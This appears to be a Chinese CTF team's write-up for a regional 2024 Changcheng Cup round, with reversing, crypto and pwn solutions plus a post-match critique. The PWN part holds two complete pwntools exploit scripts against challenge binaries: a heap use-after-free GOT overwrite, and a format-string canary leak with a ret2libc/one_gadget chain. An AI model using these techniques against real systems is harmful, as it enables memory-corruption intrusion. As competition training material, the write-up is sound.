为深入践行总体国家安全观,助力国家网络安全人才队伍建设,落实国家战略和政策要求,中国信息安全测评中心将主办第一届“长城杯”信息安全铁人三项赛(以下简称“大赛”)。本届大赛以“网络智能攻防,开启数字安全新时代”为主题,面向高等院校和职业院校在校生,注重考核参赛选手实战能力,旨在发现和挖掘高、精、尖人才。大赛设初赛、半决赛和总决赛三个阶段,半决赛及总决赛阶段获奖队伍将获得荣誉证书和奖金,纳入网络安全人才库,并获得中国信息安全测评中心颁发的注册信息安全专业人员(CISP)或国家信息安全水平考试(NISP)相关证书。
WP虽迟但到啦。。。。。=_=
本次比赛UKFC派出三个队伍,分别取得第17名,第23名和第67名的成绩。进入半决赛,我们将继续努力,取得更好成绩!
MISC
流量分析
base32
Re
茶
简单tea加密
int main(){unsigned int a1[] = {0x3687d089,0xd0d945c9,0x93363b71,0x6301bf18,0xf77e36a9,0x821920ff,0x8a7b77cd,0x50223012,0x5ccba996,0x7493212b };unsigned int a2[4] = { 0x12345678, 0x0BADF00D, 0x5201314, 0x87654321 };for (int i = 0; i <= 9; i+=2){int j = 0;unsigned int detla = 0xc6ef3720;unsigned int v5 = a1[i+1];unsigned int v6 = a1[i];do{++j;v5 -= (v6 + detla) ^ (a2[2] + 16 * v6) ^ ((v6 >> 5) + a2[3]);v6 -= (v5 + detla) ^ (*a2 + 16 * v5) ^ ((v5 >> 5) + a2[1]);detla += 1640531527;} while (j <= 31);a1[i + 1] = v5;a1[i] = v6;}for (int i = 0; i <=9; i++){for (int j = 0; j <= 3; j++){printf("%c", (a1[i] >> (j * 8)) & 0xFF);}}return 0;}//flag{7b06c572-d317-49cf-8ff2-8e402e1ea53a}
VM
差几分钟 非常可惜,加密是固定的单字节加密,动调程序获取数据后进行简单解密即可
#include <stdio.h>#include <stdint.h>int main(){int codee[]={0x05, 0x82, 0x02, 0x01,0x41, 0xA5, 0xE6, 0x00,0x2D, 0xA0, 0xDF, 0x00,0x16, 0xCB, 0x81, 0x00,0x8F, 0xBC, 0xA6, 0x00,0xF6, 0xC0, 0xA3, 0x00,0x6D, 0xB0, 0xD2, 0x00,0xA4, 0x9D, 0xE7, 0x00,0xB9, 0xD2, 0x7A, 0x00,0x7B, 0xB4, 0xB3, 0x00,0xF3, 0xCA, 0x8C, 0x00,0x4C, 0xC2, 0x87, 0x00,0xC7, 0xEE, 0x26, 0x00,0x53, 0x8B, 0x06, 0x01,0x41, 0x91, 0x0E, 0x01,0xA1, 0xB7, 0x9D, 0x00,0xD6, 0xD3, 0x77, 0x00,0x54, 0xAE, 0xCF, 0x00,0x2D, 0x99, 0xF6, 0x00,0xAE, 0xBA, 0xA9, 0x00,0x67, 0xA7, 0xD2, 0x00,0x31, 0xA6, 0xF2, 0x00,0xA1, 0xEE, 0x26, 0x00,0xE4, 0x87, 0x15, 0x01,0x4A, 0xF2, 0x1D, 0x00,0x82, 0xC3, 0xA3, 0x00,0x21, 0x90, 0x02, 0x01,0x4B, 0xB9, 0xB5, 0x00,0xA0, 0xCB, 0x6D, 0x00,0x7D, 0x86, 0x2E, 0x01,0x70, 0xA5, 0xEF, 0x00,0xE3, 0xC7, 0x85, 0x00,0xDB, 0xF0, 0x26, 0x00};for (int i=0;i<33*4;i+=4){printf("%c",printf("%c",(0xffff^((codee[i+1]<<8)|codee[i]))/((codee[i+3]<<8)|codee[i+2])));}int aa[]={125,101,110,106,105,100,97,109,96,109,98,118,122,114,105,119,96,101,107,106,108,95,123,111,129,96,111,101,124,103,97,109,108,};printf("nnn");for (int i=0;i<(sizeof(codee)/sizeof(codee[1])/4);i++){printf("%c ",aa[(sizeof(codee)/sizeof(codee[1])-i-1)]);}printf("%c",(0xffff^0xf0db)/0x26);printf("%c",(0xffff^0xc7e3)/0x85);printf("%c",(0xffff^0xa570)/0xef);return 0;}
python:
aa="}enihcam_lautriv_ekil_uoy_od{galf"for i in range(len(aa)):print(aa[len(aa)-1-i],end='')#flag{do_you_like_virtual_machine}
PWN
New_Old_man
堆题,存在UAF和后门,不知道版本瞎寄吧打,异地测试了一下doublefree是8行,那么就用edit改free后的堆块,然后再add就能申请到got表上,把随便一个库函数改成后门就完事了。
from pwn import *context(log_level='debug',arch='amd64',os='linux')io=remote('192.168.16.123',7777)menu=b"4:This old man's case is no longer neededn"gift=0x4007F7def add(idx,size,content):io.recvuntil(menu)io.sendline(b'1')io.recvuntil(b'need to add?n')io.sendline(str(idx))io.recvuntil(b" need to include?:")io.sendline(str(size))io.recvuntil('write about:')io.send(content)def dump(idx):io.recvuntil(menu)io.sendline(b'2')io.recvuntil(b'show?n')io.sendline(str(idx))def edit(idx,content):io.recvuntil(menu)io.sendline(b'3')io.recvuntil(b'edit?n')io.sendline(str(idx))io.recvuntil(b'about:n')io.send(content)def dele(idx):io.recvuntil(menu)io.sendline(b'4')io.recvuntil(b'delete?n')io.sendline(str(idx))puts_got=0x6014D0add(0,0x10,b'aaaa')dele(0)edit(0,p64(puts_got))add(1,0x10,b'aaaa')add(2,0x10,p64(gift))io.interactive()
cardstore
格式化字符串可以泄canary,但是泄不了libc,直接泄canary得了,然后用整数溢出,我这次用了俩负数,前一个比较小,后一个特别小,然后就把检测都绕过了,最后直接打ret2libc结束了。
from pwn import *context(log_level='debug',arch='amd64',os='linux')#io=process('./cardstore')io=remote('192.168.16.123',9999)main=0x400A47one=[0x45216,0x4526a,0xf02a4,0xf1147]menu=b'your choice >>n'io.recvuntil(menu)puts_plt=0x400640puts_got=0x602018pop_rdi_ret=0x400b73#gdb.attach(io)io.sendline(b'1')io.recvuntil(b'name:n')io.send('%7$p%9$p')io.recvuntil(b'0x')canary=int(io.recv(16),16)print('canary:',hex(canary))#gdb.attach(io)io.recvuntil(menu)io.sendline(b'2')io.recvuntil(b'How many cards do you want to add?')io.sendline(b'-4096')#io.interactive()io.recvuntil(menu)payload=flat(b'a'*0x108,canary,0xdeadbeef,pop_rdi_ret,puts_got,puts_plt,main)io.sendline(b'3')io.recvuntil(b'How many cards do you want to delete?')io.sendline(b'-10000')io.recvuntil(b'think of the game?n')#gdb.attach(io)io.sendline(payload)libc_base=u64(io.recv(6).ljust(8,b'x00'))-0x6F690print('libc_base:',hex(libc_base))io.sendline(b'1')io.recvuntil(b'name:n')io.send('%7$p%9$p')io.recvuntil(b'0x')canary=int(io.recv(16),16)print('canary:',hex(canary))#gdb.attach(io)io.recvuntil(menu)io.sendline(b'2')io.recvuntil(b'How many cards do you want to add?')io.sendline(b'-4096')#io.interactive()io.recvuntil(menu)payload=flat(b'a'*0x108,canary,0xdeadbeef,one[0]+libc_base)io.sendline(b'3')io.recvuntil(b'How many cards do you want to delete?')io.sendline(b'-10000')io.recvuntil(b'think of the game?n')#gdb.attach(io)io.sendline(payload)io.interactive()
Crypto
babyrsa
-
factordb直接分解n,enc文件得到c,正常解
file_path = "flag.enc"with open(file_path, "rb") as file:byte_data = file.read()long_data = int.from_bytes(byte_data, byteorder="big")print(long_data)from Crypto.Util.number import *import gmpy2p = 275127860351348928173285174381581152299q = 319576316814478949870590164193048041239n = p*qe = 65537c = 34544884515032297361938067755521025059722878179437961977941604148701451922996phi = (p-1) * (q-1)d = gmpy2.invert(e, phi)m = pow(c,d,n)print(long_to_bytes(m))# b"x02xb7 xe9x88bxbdx8cx85xb4xddJ5xabx00flag{i'mdidi???}
"
Simple code
-
首先是用encrypt还原base64编码表,代码给出的就是解密的过程
using namespace std;int inputcode[] ={ 0xD0,0xCF,0xD2,0xD1,0xD4,0xD3,0xD6,0xD5,0xC8,0xC7,0xD9,0xDD,0x1F,0x22,0x21,0x24,0x23,0x26,0x25,0x18,0x17,0x1A,0x19,0x1C,0x1B,0x1E,0x1D,0x10,0xF,0x12,0x11,0x14,0x13,0x16,0x15,0x8,0x7,0xA,0x3F,0x42,0x41,0x44,0x43,0x46,0x45,0x38,0x37,0x3A,0x39,0x3C,0x3B,0x3E,0x3D,0x30,0x2F,0x32,0x31,0x34,0x33,0x36,0x35,0x28,0x27,0x2A };void check(int* input) {for (int i = 0; i < 64; ++i) {printf("%c",(((input[i] + 0x39) & 0xff) ^ 0x39));}}int main(){check(inputcode);}
-
变表base64解密
import base64# 原表origin = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'# 变表base = "0123456789+/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"# 密文c = "ZprSLiqOlcUFIQEpQQvPtiZWI41oSPk3T6Ztxc/LLCS="# 映射表table = str.maketrans(base,origin)# 明文m = base64.b64decode(c.translate(table))for i in m:print(hex(i),end=',')# 0xb,0xc4,0x23,0x8c,0x1f,0x48,0xaf,0x8c,0x43,0xa2,0x99,0x33,0x1e,0xc1,0x42,0xbb,0x8a,0xd1,0x41,0x48,0x9a,0x8d,0xa9,0xb9,0xc6,0x47,0x20,0x7f,0x2b,0x44,0xce,0xd3,0x70
-
rc4的key有问题,加个等号解base还原
-
然后密文塞到输入就出了
using namespace std;static const char inputcode[] ={ "0123456789+/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"};int16_t Gen(unsigned char* indata, uint16_t inlen, unsigned char* outdata){uint16_t i, j;for (i = 0, j = 0; i < (inlen / 3) * 3; i = i + 3, j = j + 4){outdata[j] = 0;outdata[j + 1] = 0;outdata[j + 2] = 0;outdata[j + 3] = 0;outdata[j] = indata[i] >> 2;outdata[j + 1] = (((indata[i] & 0x03) << 4) | (indata[i + 1] >> 4));outdata[j + 2] = (((indata[i + 1] & 0x0F) << 2) | ((indata[i + 2] & 0xC0) >> 6));outdata[j + 3] = (indata[i + 2] & 0x3F);}for (i = 0; i < j; i++){outdata[i] = inputcode[outdata[i]];}if ((inlen % 3) == 1){outdata[i] = 0;outdata[i + 1] = 0;outdata[i + 2] = 0;outdata[i + 3] = 0;outdata[i] = indata[inlen - 1] >> 2;outdata[i + 1] = ((indata[inlen - 1] & 0x03) << 4);outdata[i] = inputcode[outdata[i]];outdata[i + 1] = inputcode[outdata[i + 1]];outdata[i + 2] = '=';outdata[i + 3] = '=';i = i + 4;}if ((inlen % 3) == 2){outdata[i] = 0;outdata[i + 1] = 0;outdata[i + 2] = 0;outdata[i + 3] = 0;outdata[i] = indata[inlen - 2] >> 2;outdata[i + 1] = (((indata[inlen - 2] & 0x03) << 4) | (indata[inlen - 1] >> 4));outdata[i + 2] = (indata[inlen - 1] & 0x0F) << 2;outdata[i] = inputcode[outdata[i]];outdata[i + 1] = inputcode[outdata[i + 1]];outdata[i + 2] = inputcode[outdata[i + 2]];outdata[i + 3] = '=';i = i + 4;}return i;}void encode(unsigned char* S_table, unsigned char* T_table, unsigned char* arr, unsigned int len, unsigned char* k, unsigned int len_k){int i, j = 0, tmp, key, index = 0;for (i = 0; i < 256; i++){S_table[i] = i;T_table[i] = k[i % len_k];}for (i = 0; i < 256; i++){j = (j + S_table[i] + T_table[i]) % 256;tmp = S_table[j];S_table[j] = S_table[i];S_table[i] = tmp;}i = 0;j = 0;while (len > 0){i = (i + 1) % 256;j = (j + S_table[i]) % 256;tmp = S_table[j];S_table[j] = S_table[i];S_table[i] = tmp;key = (S_table[i] + S_table[j]) % 256;arr[index] = arr[index] ^ S_table[key];printf("%c",arr[index]);index++;len--;}}int main(){unsigned char arr[33] = {0xfd,0xb7,0x78,0xc5,0x47,0x34,0x5c,0xee,0xab,0xbb,0x6a,0x9b,0xdb,0x68,0x75,0x7d,0x4f,0xfc,0xb8,0x40,0x5a,0xe3,0x55,0x83,0xe4,0x6f,0xdf,0x8c,0xe2,0xf1,0xc6,0x8e},data[] = { 0x5A, 0x70, 0x72, 0x53, 0x4C, 0x69, 0x71, 0x4F, 0x6C, 0x63, 0x55, 0x46, 0x49, 0x51, 0x45, 0x70,0x51, 0x51, 0x76, 0x50, 0x74, 0x69, 0x5A, 0x57, 0x49, 0x34, 0x31, 0x6F, 0x53, 0x50, 0x6B, 0x33,0x54, 0x36, 0x5A, 0x74, 0x78, 0x63, 0x2F, 0x4C, 0x4C, 0x43, 0x53, 0x3D };unsigned char S_table[256] = { 0 }, T_table[256] = { 0 }, k[] = { "democtf1" };int flag = 0;int n = strlen((const char*)arr);if ( n == 32){encode(S_table, T_table, arr, sizeof(arr), k, sizeof(k) - 1);}else{printf("try again~");return 0;}unsigned char encoded[50] = {0};Gen(arr, n, encoded);n = strlen((const char*)encoded);for (int i = 0; i < n ; i++){if (data[i] == encoded[i])flag++;}if (flag == 44)printf("right!");elseprintf("try again~");return 0;}
flag{qwq_crypt_ctf_ffffis_aaa!!}
最后是赛后锐评!
本赛区比赛难度不高,但web卡点比较多,且在和其他赛区的伙伴沟通后发现赛区题目难度非常不均衡,我认为这个是需要改进的。其次是没有分数降低显示,没有题目解出数量显示,作为一个黑盒让ctfer们尝试,需要选手有比较强的开题能力,也就是能快速知道题目可做程度,毕竟时间只有三个小时还是非常紧迫的。
最后,非常感谢主办方的努力,这是一次对团队非常扎实的历练!
qq群码
原文始发于微信公众号(UKFC安全):UKFC2024长城杯陕西赛区WP及赛后锐评
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论